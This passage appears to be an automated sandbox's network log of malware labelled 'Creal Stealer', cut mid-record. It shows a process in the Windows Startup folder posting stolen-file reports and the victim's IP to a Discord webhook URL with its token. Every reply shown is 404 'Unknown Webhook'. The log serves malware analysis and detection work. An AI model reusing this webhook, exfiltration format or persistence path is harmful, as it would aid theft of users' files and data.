\| 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal \| File Stealer"}, "footer": {"text": "Creal Stealer \| ht
2024-09-27 16:19:22 UTC	1339	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:22 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=41bc0bf67cec11efb1a5a6d8f199100f; Expires=Wed, 26-Sep-2029 16:19:22 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453964 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QK2%2FavJ7q0EEy1lDOKbuKgVuPHMluEIyKyqY7p2wcv7ZaG5caYZUHanDnRZ2g2gT5ut6B%2FSf2hM87wzRYHvSGsQ8%2BV5o%2FFwjz4u11digsZVRVxfpM%2Fbkqew2h8iY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=41bc0bf67cec11efb1a5a6d8f199100ffc8ec33858e1370b306ad38fdc6a81859e5d41b9cf3a6a7cac094cab1042ca91; Expires=Wed, 26-Sep-2029 16:19:22 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=f8d03ec6a155ae33fbe22a42cbc4732fd9e61759-1727453962; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:22 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6d 4a 32 53 67 50 47 6b 43 4e 53 4a 58 75 79 73 36 58 6c 52 61 77 74 6a 72 2e 50 43 6e 78 38 71 50 43 56 32 52 7a 51 50 4f 68 77 2d 31 37 32 37 34 35 33 39 36 32 38 38 37 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 61 33 39 63 62 39 34 33 30 61 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=mJ2SgPGkCNSJXuys6XlRawtjr.PCnx8qPCV2RzQPOhw-1727453962887-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0a39cb9430a-EWR
2024-09-27 16:19:22 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.8	49788	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:23 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 506 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:23 UTC	506	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal \| File Stealer"}, "footer": {"text": "Creal Stealer \| ht
2024-09-27 16:19:23 UTC	1335	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:23 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=4221b9ce7cec11efb22a3ec234dfa563; Expires=Wed, 26-Sep-2029 16:19:23 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453964 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RajYrHLG6vYlTXPvHKXXhjCsRgoOTTBE9b8pSMTRKOiaJ7Xn9I%2Frut8jeq2aeq6wJE5i63BIrKrSWJ4YjS%2F%2Ftrs9ySiZumqHvXTCNsHFHAjjdonejEc7hqgvR7Cm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=4221b9ce7cec11efb22a3ec234dfa5633d4c3bceaa996435223b91e78539479daa6b9d5aea988528bc2590d600b05200; Expires=Wed, 26-Sep-2029 16:19:23 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=a6802797d16af97b5cc620c82515f6097c37a1f8-1727453963; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:23 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 7a 73 39 65 66 67 42 33 67 32 64 6f 61 65 6e 31 5f 4f 51 67 70 7a 33 38 70 44 36 6c 56 4a 4e 76 39 4f 6b 4a 6b 4b 77 72 57 47 49 2d 31 37 32 37 34 35 33 39 36 33 35 35 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 61 37 64 38 35 37 31 38 37 39 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=zs9efgB3g2doaen1_OQgpz38pD6lVJNv9OkJkKwrWGI-1727453963554-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0a7d8571879-EWR
2024-09-27 16:19:23 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.8	49789	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:24 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 506 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:24 UTC	506	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal \| File Stealer"}, "footer": {"text": "Creal Stealer \| ht
2024-09-27 16:19:24 UTC	1333	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:24 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=42895d0e7cec11ef91567637d37b7708; Expires=Wed, 26-Sep-2029 16:19:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453965 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=442Djb16TyaSNYpe9QQFkoRlb6mTtnkFg4LNu2b%2F3PU7acl2c3vefCZ2Mp2ALhDR1FRPAuhhWLmBcR3an7k9pe1eeZ05M%2BdmVgyw3n6Piqw3DG4oBw3hqH5xUD7q"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=42895d0e7cec11ef91567637d37b770897e59a5d830536b2e6f0e7ba71757f723feff8fed87ec33947345731484d413f; Expires=Wed, 26-Sep-2029 16:19:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=5b69cb651f261fca4009e01c081c789f863c139a-1727453964; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:24 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 71 47 35 55 4a 64 74 41 71 57 35 36 52 57 47 78 78 45 59 4d 59 70 5f 74 58 50 2e 41 33 31 68 71 55 50 45 74 6c 51 49 78 4b 72 6b 2d 31 37 32 37 34 35 33 39 36 34 32 33 32 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 61 63 30 61 65 61 34 31 65 30 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=qG5UJdtAqW56RWGxxEYMYp_tXP.A31hqUPEtlQIxKrk-1727453964232-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0ac0aea41e0-EWR
2024-09-27 16:19:24 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.8	49790	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:24 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 506 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:24 UTC	506	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal \| File Stealer"}, "footer": {"text": "Creal Stealer \| ht
2024-09-27 16:19:24 UTC	1335	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:24 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=42ef70bc7cec11ef816f96ff52647fd0; Expires=Wed, 26-Sep-2029 16:19:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453966 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tHjUECUG8xQx8OVrqY4MWG73YGJU5OhI53E4gSYsEnhvmydrNtTNA6pmyr%2FdtYKlhUArl1YV4%2FYy9t7LifUfwFSNi5EKNklsJvKIwetXSve0zrmLd4vQRR91aj8%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=42ef70bc7cec11ef816f96ff52647fd0cbfa5e1ea799c67133cb6f1f55fea7058518a3dd49dc71281a0b48ecc55cfa14; Expires=Wed, 26-Sep-2029 16:19:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=5b69cb651f261fca4009e01c081c789f863c139a-1727453964; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:24 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 67 68 71 30 49 44 71 73 5f 68 45 33 38 49 32 58 38 71 50 4e 6d 38 30 54 58 4f 57 6b 5a 4d 69 36 6b 42 2e 76 37 49 5f 5f 68 58 4d 2d 31 37 32 37 34 35 33 39 36 34 39 30 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 62 30 33 64 37 38 37 63 65 65 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=ghq0IDqs_hE38I2X8qPNm80TXOWkZMi6kB.v7I__hXM-1727453964900-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0b03d787cee-EWR
2024-09-27 16:19:24 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.8	49791	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:25 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 506 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:25 UTC	506	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal \| File Stealer"}, "footer": {"text": "Creal Stealer \| ht
2024-09-27 16:19:25 UTC	1351	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:25 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=4355db5e7cec11ef955696ff52647fd0; Expires=Wed, 26-Sep-2029 16:19:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453966 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4OtqYMhNtt%2FFa0xkAHhbtWzk1SbvdFFdBj%2Be%2FNvCqmvKWDF%2B%2F1KWE0zZ7nhRNU%2F47wHJpojTcHTYtkUgqbmxI1uz%2FnAanSjP%2BjHK3ecRvp%2FRn%2FW9PmBxyuZQmwO%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=4355db5e7cec11ef955696ff52647fd07750bdb5666355c6889dc3c5a2d74bf48f0809a7944cd902d3bbada349182fdb; Expires=Wed, 26-Sep-2029 16:19:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=6afb30d70112b06f4af358280c90e707eb1bb5df-1727453965; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:25 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 4e 4a 6f 4c 50 79 5f 76 33 36 63 45 53 6a 64 44 4e 65 31 52 34 44 34 45 37 52 65 6c 75 37 43 42 72 57 70 61 30 48 4b 58 6e 56 6b 2d 31 37 32 37 34 35 33 39 36 35 35 37 35 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 62 34 38 66 38 33 30 66 33 39 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=NJoLPy_v36cESjdDNe1R4D4E7Relu7CBrWpa0HKXnVk-1727453965575-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0b48f830f39-EWR
2024-09-27 16:19:25 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.8	49792	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:26 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 506 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:26 UTC	506	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal \| File Stealer"}, "footer": {"text": "Creal Stealer \| ht
2024-09-27 16:19:26 UTC	1339	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:26 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=43bc8f027cec11efb1b69e0750befc3d; Expires=Wed, 26-Sep-2029 16:19:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453967 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7aRYifyhXSJ6%2B4KmJFX6GZ1JJvEEF71HzufJCqJNUkiZKPwX8J6VbPs3%2BKaJijOO7NMHPbO2%2BSfVukhwbCnJ%2BZmENn9TNLSs%2BY1Of4DVJAbFvHAEzdFJcxh4S0VG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=43bc8f027cec11efb1b69e0750befc3ddab8243dea90a8e330eba2ca1b5755b0961219a7b124080cbf09b4289a9c7d74; Expires=Wed, 26-Sep-2029 16:19:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=6fc67678e78038628973969bbb16166b1bae5b34-1727453966; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
